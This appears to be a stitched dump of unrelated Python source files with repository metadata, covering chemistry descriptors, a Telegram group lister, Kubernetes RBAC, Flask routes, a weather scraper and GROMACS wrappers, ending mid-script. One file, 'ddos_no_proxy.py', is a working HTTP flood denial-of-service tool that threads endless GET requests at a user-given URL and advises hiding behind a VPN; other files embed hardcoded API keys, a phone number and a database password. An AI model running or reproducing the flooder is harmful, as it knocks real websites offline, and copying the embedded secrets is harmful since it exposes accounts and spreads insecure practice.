rdkit_descriptors = ['BalabanJ','BertzCT','FractionCSP3','HallKierAlpha','HeavyAtomCount','HeavyAtomMolWt',\
'Kappa1','Kappa2','Kappa3','LabuteASA', 'MaxAbsEStateIndex', 'MaxAbsPartialCharge', 'MaxEStateIndex', 'MaxPartialCharge',\
'MinAbsEStateIndex', 'MinAbsPartialCharge', 'MinEStateIndex', 'MinPartialCharge','MolLogP','MolMR','NHOHCount','NOCount',\
'NumHeteroatoms','NumRotatableBonds','NumValenceElectrons','TPSA']
rdkit_mol_descrip_calculator = MolecularDescriptorCalculator(rdkit_descriptors)
def Calculate_rdkit_mol_descriptors(mol_string):
"""
Calculate the molecular descriptors available in RDkit
:param mol_string: smiles form or InChI string of the molecule
:return: a list of RDkit molecular descriptors of the molecule
"""
if 'InChI=' in mol_string:
mol_string = inchi2smiles(mol_string)
cur_molecule = Chem.MolFromSmiles(mol_string)
cur_mol_properties = rdkit_mol_descrip_calculator.CalcDescriptors(cur_molecule)
return list(cur_mol_properties)
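    # Illustrative usage sketch (assumes RDKit is installed; the SMILES is an
    # arbitrary example): the returned list is aligned with rdkit_descriptors,
    # so it can be mapped back to names with
    #   dict(zip(rdkit_descriptors, Calculate_rdkit_mol_descriptors('CCO')))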
def Calculate_mol_properties(mol_string):
"""
    Calculate all molecular descriptors: partial charges, steric hindrance, and the ChemAxon and RDKit molecular descriptors
:param mol_string: smiles form or InChI string of the molecule
:return: the molecular descriptors of the molecule
"""
if 'InChI=' in mol_string:
mol_string = inchi2smiles(mol_string)
total_atom_num_and_partial_charge = Calculate_total_atom_num_and_partial_charge(mol_string)
total_steric_hindrance = [Calculate_total_Steric_hindrance(mol_string)]
chemaxon_mol_properties = Calculate_chemaxon_mol_properties(mol_string)
rdkit_mol_properties = Calculate_rdkit_mol_descriptors(mol_string)
all_mol_properties = total_atom_num_and_partial_charge + total_steric_hindrance + chemaxon_mol_properties + rdkit_mol_properties
return all_mol_properties | 2.328125 | 2 |
Z_ALL_FILE/Py1/omt.py | omikabir/omEngin | 0 | 12786332 | from telethon.sync import TelegramClient
from telethon.sessions import StringSession
from pprint import pprint
import os
api_id = 628127
api_hash = 'db7fa09d585d6eedddd0df5973f3239b'
phone = '+8801817184338'
client = TelegramClient(phone, api_id, api_hash)
client.connect()
if not client.is_user_authorized():
client.send_code_request(phone)
client.sign_in(phone, input('Enter the code: '))
async def main():
st = ""
async for dialog in client.iter_dialogs():
try:
st1 = str(dialog.id)
st2 = st1[0]
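            # chr(45) is '-': Telegram group/channel dialog ids are negative,
            # so only those dialogs are collected below.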
if st2 == chr(45):
st = st + "\n" + str(dialog.id) + ',' + str(dialog.name)
except:
pass
return st
def wrt_content(st):
try:
file = os.getcwd() + "//omgroup//omgrp.txt"
fl = open(file, "w+", encoding="utf-8")
fl.write(st)
fl.close()
except:
file = os.getcwd() + "//omgrp.txt"
fl = open(file, "w+", encoding="utf-8")
fl.write(st)
fl.close()
return file
def client_run():
with client:
sx = client.loop.run_until_complete(main())
fl = wrt_content(sx)
return fl
| 2.5 | 2 |
ddos_no_proxy.py | ph-fox/dos | 0 | 12786333 | #!/usr/bin/python3
import requests, threading, os, readline, optparse
from colorama import Fore
read = optparse.OptionParser()
read.add_option('-u', '--url',help="Enter Website url", dest='url')
(value, key) = read.parse_args()
url = value.url
if url is None:
print("Coded by: <NAME>")
print("github: https://github.com/abalesluke")
print("Note: i am no longer responsible for any misuse of this tool!.")
print("\nTip: before executing this code you can also use -u flag\neg.[python3 reqflood.py -u <url>]")
print("You must Use vpn when using this!, cuz this version doesnt use proxy\n")
url = input('Enter url: ')
else:
pass
count = 0
def flood():
try:
header = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"}
for x in range(100):
r = requests.get(url, headers=header)
global count
count+=1
print(f'{Fore.GREEN}[{Fore.CYAN}{count}{Fore.GREEN}] {Fore.CYAN}request/s sent to: {Fore.GREEN}{url} [{Fore.MAGENTA}{r.status_code}{Fore.GREEN}]')
except KeyboardInterrupt:
exit(0)
except:
pass
threads = []
while True:
for i in range(100):
x = threading.Thread(target=flood)
x.daemon = True
threads.append(x)
for i in range(100):
threads[i].start()
for i in range(100):
threads[i].join()
| 2.8125 | 3 |
esk/controller/models/secretbindings.py | esk8s/esk | 1 | 12786334 | <reponame>esk8s/esk
import kubernetes
class SecretBinding:
def __init__(self, name, namespace, service_account, secrets, target = None, template = None):
self.__name = name
self.__namespace = namespace
self.__service_account = service_account
self.__secrets = secrets
self.__target = target if target is not None else f"/esk/secrets/{ name }"
self.__template = template
def compare_spec(self, spec):
'''
Compare a spec with self.spec, return true if the same
'''
return self.__target == spec.get('target') and self.__template == spec.get('template')
def to_k8s_resources(self):
'''
Transform this binding to a kubernetes role and role binding
'''
role = kubernetes.client.V1Role(
metadata = kubernetes.client.V1ObjectMeta(
name = self.__name,
namespace = self.__namespace
),
rules = [
kubernetes.client.V1PolicyRule(
api_groups = ['esk.io'],
resources = ['externalsecrets'],
resource_names = [ s.get('name') for s in self.__secrets ],
verbs = ['get']
),
kubernetes.client.V1PolicyRule(
api_groups = ['esk.io'],
resources = ['secretbindings'],
resource_names = [self.__name],
verbs = ['get']
)
]
)
role_binding = kubernetes.client.V1RoleBinding(
role_ref = kubernetes.client.V1RoleRef(
api_group = 'rbac.authorization.k8s.io',
kind = 'Role',
name = self.__name
),
metadata = kubernetes.client.V1ObjectMeta(
name = self.__name,
namespace = self.__namespace
),
subjects = [
kubernetes.client.V1Subject(
kind = 'ServiceAccount',
name = self.__service_account,
namespace = self.__namespace
)
]
)
return role, role_binding
def get_spec(self):
return {
'serviceAccount': self.__service_account,
'secrets': self.__secrets,
'target': self.__target,
'template': self.__template
}
def get_namespace(self):
return self.__namespace
def get_name(self):
return self.__name
def get_target(self):
return self.__target
def get_template(self):
return self.__template | 2.265625 | 2 |
ED_remoto/auth.py | fabriciocgf/Remote_Lab_FPGA | 0 | 12786335 | <reponame>fabriciocgf/Remote_Lab_FPGA
"""Routes for user authentication."""
from flask import redirect, render_template, flash, Blueprint, request, url_for
from .forms import LoginForm, SignupForm
from .models import db, User
# Blueprint Configuration
auth_bp = Blueprint('auth_bp', __name__,
template_folder='templates',
static_folder='static')
@auth_bp.route('/signup', methods=['GET', 'POST'])
def signup():
    # Bind the imported form class so the template receives a form instance.
    signup_form = SignupForm()
    return render_template('signup.jinja2',
                           title='Create an Account.',
                           form=signup_form,
                           template='signup-page',
                           body="Sign up for a user account.")
@auth_bp.route('/login', methods=['GET', 'POST'])
def login():
    # Bind the imported form class so the template receives a form instance.
    login_form = LoginForm()
    return render_template('login.jinja2',
                           form=login_form,
                           title='Log in.',
                           template='login-page',
                           body="Log in with your User account.")
| 2.453125 | 2 |
Dublin_Bikes/weather_scraper/weatherScraper.py | TeamCGS/Dublin_Bikes | 0 | 12786336 | import json
import requests
from sqlalchemy import Column, Integer, String, Float, Boolean
from pprint import pprint
from sqlalchemy import create_engine
from sqlalchemy.orm import scoped_session, sessionmaker
from base_file import Base
import time
import datetime
import traceback  # used by the error handler in getWeatherData
class Weather(Base):
"""
Create a Weather table
"""
__tablename__ = 'weather1'
    id = Column(Integer, nullable=False, primary_key=True)
name = Column(String(100), nullable = False)
humidity = Column(Integer ,nullable = False)
temp = Column(Integer, nullable=False)
temp_max = Column(Integer, nullable=False)
temp_min = Column(Integer, nullable=False)
description = Column(String(100), nullable = False)
icon = Column(String(100), nullable = False)
main_description = Column(String(100), nullable = False)
timeDate = Column(String (100), primary_key=True, nullable=False)
def getWeatherData(self):
weather_engine = create_engine('mysql+mysqlconnector://CGSdatabase:[email protected]/dublinbikes', convert_unicode=True)
Session = sessionmaker(bind=weather_engine)
talk_session = Session()
Base.metadata.create_all(bind=weather_engine)
while True:
try:
STATIONS_URI = "api.openweathermap.org/data/2.5/weather?"
api_url = 'http://api.openweathermap.org/data/2.5/weather'
appid = "033bc70c21f56a4af381b76c18f81458"
r = requests.get(url=api_url, params=dict(q='Dublin', APPID=appid))
#pprint(r)
data = r.json()
#pprint(data)
self.writeToDatabase(weather_engine,talk_session,data)
time.sleep(30*60)
except:
if weather_engine is None:
print(traceback.format_exc())
talk_session.close()
return
def writeToDatabase(self, weather_engine, talk_session, data):
self.data = data
now = datetime.datetime.now()
weather = Weather(id=self.data["id"],
name=self.data["name"],
humidity=self.data["main"]["humidity"],
temp_max=self.data["main"]["temp_max"],
temp_min=self.data["main"]["temp_min"],
temp=self.data["main"]["temp"],
description=self.data["weather"][0]["description"],
icon=self.data["weather"][0]["icon"],
main_description=self.data["weather"][0]["main"],
timeDate=now)
talk_session.add(weather)
talk_session.commit()
return
| 2.859375 | 3 |
tsadm/ansible/inventory/__init__.py | jctincan/tsadm-webapp | 0 | 12786337 |
from . import groupvars
from . import hostvars
wapp = None
def __init():
groupvars.wapp = wapp
hostvars.wapp = wapp
def getinv():
__init()
master_server = wapp.conf.get('MASTER_SERVER')
slave_all = wapp.db.slave_all()
hosts_all = [h['fqdn'] for h in slave_all]
hosts_all.append(master_server)
inv = {
'all': {
'hosts': hosts_all,
'vars': groupvars.hosts_all()
},
'master_server': {
'hosts': [master_server],
'vars': groupvars.master_server()
},
'slave_servers': {
'hosts': [h['fqdn'] for h in slave_all],
'vars': {}
},
'_meta': {
'hostvars': hostvars.getall(slave_all),
}
}
return inv
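    # Usage sketch: as an Ansible dynamic inventory this is typically emitted as
    # JSON, e.g. print(json.dumps(getinv())) when the script is called with --list
    # (json import assumed; not part of this module).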
| 2.46875 | 2 |
src/pycsd/test/test_csd_integers.py | luk036/ellpy | 7 | 12786338 | #! /usr/bin/env python3
"""
Unittests for the CSD module
"""
import unittest
import pycsd.csd as csd
good_values_dict = {
32: '+00000',
-32: '-00000',
0: '0',
7: '+00-',
15: '+000-'
}
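# CSD digits are read most-significant first with weights 2**k ('+' = +1, '-' = -1,
# '0' = 0), so e.g. '+00-' = 8 - 1 = 7 and '+000-' = 16 - 1 = 15 as listed above.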
class tests__integers(unittest.TestCase):
def test__01_to_integer(self):
""" Check conversion from CSD to integer """
for key in good_values_dict.keys():
csd_str = good_values_dict[key]
value = csd.to_decimal(csd_str)
self.assertEqual(value, key)
def test__02_to_csd(self):
""" Check that integers are converted to CSD properly. """
for key in good_values_dict.keys():
csd_str = csd.to_csd(key)
self.assertEqual(csd_str, good_values_dict[key])
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(tests__integers))
return suite
if __name__ == '__main__':
unittest.main()
| 3.5625 | 4 |
5_asyncio/future_threadpool_deadlock.py | Nataliyi/async | 5 | 12786339 | <filename>5_asyncio/future_threadpool_deadlock.py
from concurrent.futures import ThreadPoolExecutor
import time
a_future = None
b_future = None
def wait_on_b():
time.sleep(2) # blocking events
print(b_future.result()) # b_future will never complete because it is waiting on a_future.
return 5
def wait_on_a():
time.sleep(2)
print(a_future.result()) # a_future will never complete because it is waiting on b_future.
return 6
# It will deadlock: both worker threads are occupied, and each future waits on the
# other's result (visible through the shared module-level variables), so neither completes.
if __name__ == '__main__':
executor = ThreadPoolExecutor(max_workers=2)
print(f"started at {time.strftime('%X')}")
a_future = executor.submit(wait_on_b) # return 5
b_future = executor.submit(wait_on_a) # return 6
print(a_future)
print(b_future)
# time.sleep(2)
#
# print(a_future.result())
# print(b_future.result())
print(f"finished at {time.strftime('%X')}")
| 3.515625 | 4 |
src/idms/functions.py | ProvZH/opentext | 1 | 12786340 | <reponame>ProvZH/opentext<filename>src/idms/functions.py
# from mimetype_description import get_mime_type_description
def mimetype2FileType(mimetype: str) -> str:
"""
Lookup table for mime type to file type.
"""
convertDict = {
"application/vnd.openxmlformats-officedocument.spreadsheetml.sheet": "Excel",
"application/x-zip-compressed": "Compressed folder",
"application/x-outlook-msg": "Mail message",
"application/octet-stream": "Data file (csv?)"
}
return convertDict.get(mimetype) or "Mimetype not Found: " + str(mimetype) # or get_mime_type_description(mimetype) | 2.296875 | 2 |
msl/equipment/config.py | SwiftyMorgan/msl-equipment | 0 | 12786341 | """
Load an XML :ref:`configuration_file`.
"""
import os
import logging
from xml.etree import cElementTree as ET
from .database import Database
logger = logging.getLogger(__name__)
class Config(object):
PyVISA_LIBRARY = '@ni'
""":class:`str`: The PyVISA backend_ library to use.
.. _backend: https://pyvisa.readthedocs.io/en/stable/backends.html
"""
DEMO_MODE = False
""":class:`bool`: Whether to open connections in demo mode.
The equipment does not need to be physically connected to a computer.
"""
PATH = []
""":class:`list` of :class:`str`: Paths are also appended to :data:`os.environ['PATH'] <os.environ>`."""
def __init__(self, path):
"""Load an XML :ref:`configuration_file`.
This function is used to set the configuration constants to use for the Python runtime
and it allows you to access :class:`.EquipmentRecord`'s from an :ref:`equipment_database`
and :class:`.ConnectionRecord`'s from a :ref:`connections_database`.
**MSL-Equipment** constants that can be defined in a :ref:`configuration_file`:
+----------------+-----------------------------------+-----------------------------------------+
| Name | Example Values | Description |
+================+===================================+=========================================+
| pyvisa_library | @ni, @py, @sim, /path/to/lib\@ni | The PyVISA backend_ library to use. |
+----------------+-----------------------------------+-----------------------------------------+
| demo_mode | true, false | Whether to open connections in demo |
| | | mode. |
+----------------+-----------------------------------+-----------------------------------------+
| path | /path/to/SDKs, D:/images | A path that contains external resources.|
| | | Accepts a *recursive="true"* attribute. |
| | | Appends the path(s) to |
| | | :data:`os.environ['PATH'] <os.environ>` |
| | | and to :attr:`.PATH` |
+----------------+-----------------------------------+-----------------------------------------+
Also, the user is encouraged to define their own application-specific constants within the
configuration file.
.. _backend: https://pyvisa.readthedocs.io/en/stable/backends.html
Parameters
----------
path : :class:`str`
The path to an XML :ref:`configuration_file`.
Raises
------
IOError
If `path` does not exist or if the :ref:`configuration_file` is invalid.
"""
logger.debug('Loading {}'.format(path))
try:
self._root = ET.parse(path).getroot()
parse_err = ''
except ET.ParseError as err:
parse_err = str(err)
if parse_err:
raise IOError(parse_err)
self._path = path
self._database = None
element = self._root.find('pyvisa_library')
if element is not None:
Config.PyVISA_LIBRARY = element.text
logger.debug('update Config.PyVISA_LIBRARY = {}'.format(Config.PyVISA_LIBRARY))
element = self._root.find('demo_mode')
if element is not None:
Config.DEMO_MODE = element.text.lower() == 'true'
logger.debug('update Config.DEMO_MODE = {}'.format(Config.DEMO_MODE))
for element in self._root.findall('path'):
if not os.path.isdir(element.text):
logger.warning('Not a valid PATH ' + element.text)
continue
if element.attrib.get('recursive', 'false').lower() == 'true':
for root, dirs, files in os.walk(element.text):
Config.PATH.append(root)
else:
Config.PATH.append(element.text)
for p in Config.PATH:
os.environ['PATH'] += os.pathsep + p
logger.debug('append Config.PATH %s', p)
@property
def path(self):
""":class:`str`: The path to the configuration file."""
return self._path
@property
def root(self):
"""Returns the root element (the first node) of the XML tree.
Returns
-------
:class:`~xml.etree.ElementTree.Element`
The root element.
"""
return self._root
def database(self):
"""
Returns
-------
:class:`~.database.Database`
A reference to the equipment and connection records in the database(s)
that are specified in the configuration file.
"""
if self._database is None:
self._database = Database(self._path)
return self._database
def value(self, tag):
"""Gets the value associated with the specified `tag` in the configuration file.
Parameters
----------
tag : :class:`str`
The name of a XML tag in the configuration file.
Returns
-------
:class:`str` or :data:`None`
The value associated with the `tag` or :data:`None` if the tag cannot be found.
"""
element = self._root.find(tag)
if element is not None:
return element.text
return None
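    # Illustrative usage sketch (file name and tag are hypothetical):
    #   cfg = Config('my_lab_config.xml')
    #   db = cfg.database()            # equipment/connection records
    #   host = cfg.value('smtp_host')  # None if the tag is absent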
| 3.03125 | 3 |
gromacs_wrapper/genrestr.py | bioexcel/virtualscreening | 3 | 12786342 | #!/usr/bin/env python
"""Python wrapper module for the GROMACS genrestr module
"""
import sys
import re
import json
import os
import configuration.settings as settings
from command_wrapper import cmd_wrapper
from tools import file_utils as fu
class Genrestr(object):
"""Wrapper class for the GROMACS genrestr module.
Args:
input_structure_path (str): Path to the input structure PDB/GRO/TPR file.
input_ndx_path (str): Path to the input index NDX file.
input_top_zip_path (str): Path the input TOP topology in zip format.
output_top_zip_path (str): Path the output TOP topology in zip format.
properties (dic):
| **output_top_path** (*str*): Path the output TOP file.
| **output_itp_path** (*str*): Path to the output include for topology ITP file.
| **force_constants** (*float[3]*): Array of three floats defining the force constants
"""
def __init__(self, input_structure_path, input_ndx_path, input_top_zip_path,
output_top_zip_path, properties, **kwargs):
if isinstance(properties, basestring):
properties=json.loads(properties)
self.input_structure_path = input_structure_path
self.input_ndx_path = input_ndx_path
self.input_top_zip_path = input_top_zip_path
self.output_top_zip_path = output_top_zip_path
self.output_itp_path = properties.get('output_itp_path','restrain.itp')
self.output_top_path = properties.get('output_top_path','restrain.top')
self.force_constants = properties.get('force_constants','500 500 500')
self.restricted_group = properties.get('restricted_group', 'system')
self.gmx_path = properties.get('gmx_path',None)
self.mutation = properties.get('mutation',None)
self.step = properties.get('step',None)
self.path = properties.get('path','')
self.mpirun = properties.get('mpirun',False)
self.mpirun_np = properties.get('mpirun_np',None)
def launch(self):
"""Launches the execution of the GROMACS pdb2gmx module.
"""
out_log, err_log = fu.get_logs(path=self.path, mutation=self.mutation, step=self.step)
self.output_top_path = fu.add_step_mutation_path_to_name(self.output_top_path, self.step, self.mutation)
self.output_itp_path = fu.add_step_mutation_path_to_name(self.output_itp_path, self.step, self.mutation)
gmx = "gmx" if self.gmx_path is None else self.gmx_path
cmd = [gmx, "genrestr", "-f", self.input_structure_path,
"-n", self.input_ndx_path, "-o", self.output_itp_path,
"-fc", self.force_constants]
if self.mpirun_np is not None:
cmd.insert(0, str(self.mpirun_np))
cmd.insert(0, '-np')
if self.mpirun:
cmd.insert(0, 'mpirun')
if self.mpirun:
cmd.append('<<<')
cmd.append('\"'+self.restricted_group+'\"')
else:
cmd.insert(0, '|')
cmd.insert(0, '\"'+self.restricted_group+'\"')
cmd.insert(0, 'echo')
command = cmd_wrapper.CmdWrapper(cmd, out_log, err_log)
returncode = command.launch()
fu.unzip_top(zip_file=self.input_top_zip_path, top_file=self.output_top_path)
out_log.info('Unzip: '+ self.input_top_zip_path + ' to: '+self.output_top_path)
with open(self.output_top_path, 'r') as fin:
for line in fin:
if line.startswith('#ifdef POSRES'):
itp_name = re.findall('"([^"]*)"',fin.next())[0]
out_log.debug('itp_name: '+itp_name)
break
# with open(self.output_top_path, 'r') as fin:
# data = fin.read().splitlines(True)
# index = data.index('#ifdef POSRES\n')
# data[index+2] = 'system\n'
# data.insert(index, '\n')
# data.insert(index, '#endif\n')
# data.insert(index, '#include "'+self.output_itp_path+'"\n')
# data.insert(index, '#ifdef CUSTOM_POSRES\n')
# data.insert(index, '; Include Position restraint file\n')
# # data.insert(index, '#include "'+self.output_itp_path+'"\n')
# # data.insert(index, '; Include genrestr generated itp\n')
# with open(self.output_top_path, 'w') as fout:
# fout.writelines(data)
with open(self.output_itp_path, 'r') as fin:
data = fin.read().splitlines(True)
# data.insert(0, '\n')
# data.insert(0, 'system 3\n')
# data.insert(0, ';Name nrexcl\n')
# data.insert(0, '[ system ]\n')
with open(itp_name, 'w') as fout:
fout.writelines(data)
os.remove(self.output_itp_path)
# zip topology
fu.zip_top(self.output_top_path, self.output_top_zip_path, remove_files=False)
out_log.info('Zip: '+ self.output_top_path +' to: '+ self.output_top_zip_path)
return returncode
#Creating a main function to be compatible with CWL
def main():
system=sys.argv[1]
step=sys.argv[2]
properties_file=sys.argv[3]
prop = settings.YamlReader(properties_file, system).get_prop_dic()[step]
    # NOTE: the positional CLI argument mapping (sys.argv[4:8]) is assumed.
    Genrestr(input_structure_path=sys.argv[4],
             input_ndx_path=sys.argv[5],
             input_top_zip_path=sys.argv[6],
             output_top_zip_path=sys.argv[7],
             properties=prop).launch()
if __name__ == '__main__':
main()
| 2.34375 | 2 |
euler/e7.py | volkerha/DT211-3-Cloud | 0 | 12786343 | primeCount = 0
prime = 2
loopCount = 2
#check if number is prime
def isPrime(p):
for i in range(2, p):
if p % i == 0:
return 0
return 1
#loop until the 10001st prime number
while primeCount < 10001:
    #prime? increase primeCount
if isPrime(loopCount) == 1:
primeCount += 1
prime = loopCount
loopCount += 1
#last prime number
print(prime)
| 3.984375 | 4 |
dataloaders/__init__.py | kopetri/MIDAS_pytorch | 2 | 12786344 | # -*- coding: utf-8 -*-
# @Time : 2018/10/21 20:43
# @Author : <NAME>
# @Email : <EMAIL> | 0.917969 | 1 |
public_admin/urls.py | smegurus/smegurus-django | 1 | 12786345 | <gh_stars>1-10
from django.conf.urls import include, url
from public_admin.views import dashboard_view, organization_view
urlpatterns = (
url(r'^janitor/organization/create/(.*)/2/$', organization_view.organization_create_2_page, name='public_admin_organization_create_2'),
url(r'^janitor/organization/create/(.*)/1/$', organization_view.organization_create_1_page, name='public_admin_organization_create_1'),
url(r'^janitor/organization/initialize$', organization_view.organization_initialization_page, name='public_admin_organization_initialization'),
url(r'^janitor/organization/list$', organization_view.organization_master_page, name='public_admin_organization_master'),
url(r'^janitor/organization$', organization_view.organization_menu_page, name='public_admin_organization'),
url(r'^janitor$', dashboard_view.dashboard_master_page, name='public_admin_dashboard_master'),
)
| 1.789063 | 2 |
problems/test_0059_one_loop.py | chrisxue815/leetcode_python | 1 | 12786346 | <filename>problems/test_0059_one_loop.py
import unittest
from typing import List
import utils
# O(n) time. O(1) space. Matrix, one loop.
class Solution:
def generateMatrix(self, n: int) -> List[List[int]]:
m = [[0] * n for _ in range(n)]
r, c, dr, dc = 0, 0, 0, 1
for i in range(1, n * n + 1):
m[r][c] = i
if m[(r + dr) % n][(c + dc) % n]:
dr, dc = dc, -dr
r += dr
c += dc
return m
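        # Example: generateMatrix(3) returns
        #   [[1, 2, 3],
        #    [8, 9, 4],
        #    [7, 6, 5]]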
class Test(unittest.TestCase):
def test(self):
cases = utils.load_test_json(__file__).test_cases
for case in cases:
args = str(case.args)
actual = Solution().generateMatrix(**case.args.__dict__)
self.assertEqual(case.expected, actual, msg=args)
if __name__ == '__main__':
unittest.main()
| 3.421875 | 3 |
backend/backend/routing.py | Trevor-Mansfield/WalmartReceiptSplitter | 0 | 12786347 | from channels.auth import AuthMiddlewareStack
from channels.routing import ProtocolTypeRouter, URLRouter, ChannelNameRouter
import cost_claimer.routing
import cost_claimer.consumers
application = ProtocolTypeRouter({
'websocket': AuthMiddlewareStack(
URLRouter(
cost_claimer.routing.websocket_urlpatterns
)
),
"channel": ChannelNameRouter({
"user_action": cost_claimer.consumers.GroupCostWorker,
}),
})
| 1.859375 | 2 |
URI/1010.py | leilaapsilva/BabySteps | 37 | 12786348 | <reponame>leilaapsilva/BabySteps
peca1 = input().split()
peca2 = input().split()
quantidadePeca1 = int(peca1[1])
quantidadePeca2 = int(peca2[1])
valorPeca1 = float(peca1[2])
valorPeca2 = float(peca2[2])
total = (quantidadePeca1 * valorPeca1) + (quantidadePeca2 * valorPeca2)
print("VALOR A PAGAR: R$ {:.2f}".format(total))
| 3.578125 | 4 |
process/4_score.py | omarmaddouri/GCNCC_1 | 4 | 12786349 | <filename>process/4_score.py<gh_stars>1-10
from __future__ import division
from __future__ import print_function
from pathlib import Path
import sys
project_path = Path(__file__).resolve().parents[1]
sys.path.append(str(project_path))
import tensorflow as tf
import os
import numpy as np
from collections import defaultdict
import csv
from scipy import stats
# Settings
flags = tf.compat.v1.flags
FLAGS = flags.FLAGS
flags.DEFINE_string('train_dataset', 'brc_microarray_netherlands', 'Train dataset string.')
flags.DEFINE_string('test_dataset', 'brc_microarray_usa', 'Test dataset string.')
flags.DEFINE_string('clustering_method', 'geometric_ap', 'Name of the clustering method.')
flags.DEFINE_string('embedding_method', 'gcn', 'Name of the embedding method.')
flags.DEFINE_string('scoring_data', 'full_data.txt', 'Full data to be used for clusters scoring.')
flags.DEFINE_string('clusters', 'clusters.txt', 'Name of clusters file.')
flags.DEFINE_list('labels', ["free", "metastasis"], 'List of class labels.')
#Check data availability
if not os.path.isdir("{}/data/parsed_input/{}".format(project_path, FLAGS.train_dataset)):
sys.exit("{} dataset is not available under data/parsed_input/".format(FLAGS.train_dataset))
if not os.path.isfile("{}/data/parsed_input/{}/{}".format(project_path, FLAGS.train_dataset, FLAGS.scoring_data)):
sys.exit("{} file is not available under /data/parsed_input/{}/".format(FLAGS.scoring_data, FLAGS.train_dataset))
if not os.path.isfile("{}/data/output/{}/clustering/{}/{}/{}".format(project_path, FLAGS.train_dataset, FLAGS.clustering_method, FLAGS.embedding_method, FLAGS.clusters)):
sys.exit("{} file is not available under /data/output/{}/clustering/{}/{}".format(FLAGS.clusters, FLAGS.train_dataset, FLAGS.clustering_method, FLAGS.embedding_method))
if not os.path.isdir("{}/data/output/{}/scoring/{}/{}".format(project_path, FLAGS.train_dataset, FLAGS.clustering_method, FLAGS.embedding_method)):
os.makedirs("{}/data/output/{}/scoring/{}/{}".format(project_path, FLAGS.train_dataset, FLAGS.clustering_method, FLAGS.embedding_method))
print("----------------------------------------")
print("----------------------------------------")
print("Configuration:")
print("Training dataset: {}".format(FLAGS.train_dataset))
print("Testing dataset: {}".format(FLAGS.test_dataset))
print("Clustering Method: {}".format(FLAGS.clustering_method))
print("Embedding Method: {}".format(FLAGS.embedding_method))
print("Class labels: {}".format(FLAGS.labels))
print("----------------------------------------")
print("----------------------------------------")
scoring_data = np.genfromtxt("{}/data/parsed_input/{}/{}".format(project_path, FLAGS.test_dataset, FLAGS.scoring_data), dtype=np.dtype(str), skip_footer=1)
clusters = open("{}/data/output/{}/clustering/{}/{}/{}".format(project_path, FLAGS.train_dataset, FLAGS.clustering_method, FLAGS.embedding_method, FLAGS.clusters), encoding="utf-8")
#Use eps value to adjust transformed values with very low pdf
eps = np.finfo(np.double).eps
np.random.seed(seed=123)
label_samples = scoring_data[:,-1]
idx_label_samples = {}
for label in FLAGS.labels:
idx_label_samples[label] = np.ravel(np.where(label_samples==label))
score_clusters = {}
score_clusters["cluster_index"] = ["activity_score", "cluster_size"]
cluster_index = 0
print("Scoring of clusters...")
for line in clusters:
line = line.strip()#To remove spaces
members = np.asarray(line.split("\t")[1:], dtype=np.int32)
    current_cluster_features = np.asarray(scoring_data[:,members].T, dtype=np.float32) #Transpose so that genes are in rows
# Remove missing gene expressions
current_cluster_features = current_cluster_features[~np.all(current_cluster_features == 0, axis=1)]
if(current_cluster_features.shape[0] != 0):
phenotype1 = current_cluster_features[:, idx_label_samples[FLAGS.labels[0]]] #Select the samples under phenotype 1
phenotype2 = current_cluster_features[:, idx_label_samples[FLAGS.labels[1]]] #Select the samples under phenotype 2
mu1 = np.mean(phenotype1, axis=1)
std1 = np.std(phenotype1, axis=1)
std1[std1<eps] = eps
mu2 = np.mean(phenotype2, axis=1)
std2 = np.std(phenotype2, axis=1)
std2[std2<eps] = eps
l = phenotype1.shape[1]
for i in range(current_cluster_features.shape[0]):
row = np.concatenate((phenotype1[i,:], phenotype2[i,:]))
N1 = stats.norm(mu1[i],std1[i]).pdf(row)
N2 = stats.norm(mu2[i],std2[i]).pdf(row)
#Cutoff of outliers
N1[N1<eps] = eps
N2[N2<eps] = eps
row = np.log(N1) - np.log(N2)
if(np.count_nonzero(row) == 0):
transformed_row = row
else:
transformed_row = stats.zscore(row)
phenotype1[i,:] = transformed_row[:l]
phenotype2[i,:] = transformed_row[l:]
aggregated_phenotype1 = np.sum(phenotype1, axis=0, dtype=np.float32)
aggregated_phenotype2 = np.sum(phenotype2, axis=0, dtype=np.float32)
t, p = stats.ttest_ind(aggregated_phenotype1, aggregated_phenotype2, equal_var = False)
else:
t=0
p=1
cluster_size = members.shape[0]
score_clusters[cluster_index] = [np.abs(t), cluster_size]
cluster_index+=1
clusters.close()
if(FLAGS.train_dataset == FLAGS.test_dataset):
with open("{}/data/output/{}/scoring/{}/{}/clusters.scores.txt".format(project_path, FLAGS.train_dataset, FLAGS.clustering_method, FLAGS.embedding_method), "w", newline='', encoding="utf-8") as f:
w_scores = csv.writer(f, delimiter ='\t')
for key, val in score_clusters.items():
w_scores.writerow([key, val[0], val[1]])
print("Successful generation of cluster scores in /data/output/{}/scoring/{}/{}/clusters.scores.txt".format(FLAGS.train_dataset, FLAGS.clustering_method, FLAGS.embedding_method))
else:
with open("{}/data/output/{}/scoring/{}/{}/cross.{}.clusters.scores.txt".format(project_path, FLAGS.train_dataset, FLAGS.clustering_method, FLAGS.embedding_method, FLAGS.test_dataset), "w", newline='', encoding="utf-8") as f:
w_scores = csv.writer(f, delimiter ='\t')
for key, val in score_clusters.items():
w_scores.writerow([key, val[0], val[1]])
print("Successful generation of cluster scores in /data/output/{}/scoring/{}/{}/cross.{}.clusters.scores.txt".format(FLAGS.train_dataset, FLAGS.clustering_method, FLAGS.embedding_method, FLAGS.test_dataset)) | 2.078125 | 2 |
people_filterNetwork.py | dpastoresc/NarrativeDynamics | 1 | 12786350 | # -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
"""
import pandas as pd
import numpy as np
import seaborn as sns
import mysql.connector
from sqlalchemy import create_engine
import nltk
import re
from nltk.corpus import stopwords
import string
from bs4 import BeautifulSoup
import matplotlib.pyplot as plt
from nltk.stem import SnowballStemmer
import pickle
import itertools
import networkx as nx
import time
from datetime import datetime, timedelta, date
from timeit import default_timer as timer
from sys import argv
db_name_table = 'PostsMadCar'#str(argv[1])
#db_name_table = 'PostsCorMad'#str(argv[1])
db2='UsersMadCar'#str(argv[1])
#db2='UsersCorMad'#str(argv[1])
datapath='/home/davidpastor/Narrativas/MadCar/'
#datapath='/home/davidpastor/Narrativas/CorMad/'
tag=''
th=10
start=timer()
path_graphs = 'People/'
with open(datapath+path_graphs+db_name_table+'NetPeople'+tag+'.cnf', 'rb') as handle:
Gu=pickle.load(handle)
with open(datapath+path_graphs+db_name_table+'NetDPeople'+tag+'.cnf', 'rb') as handle:
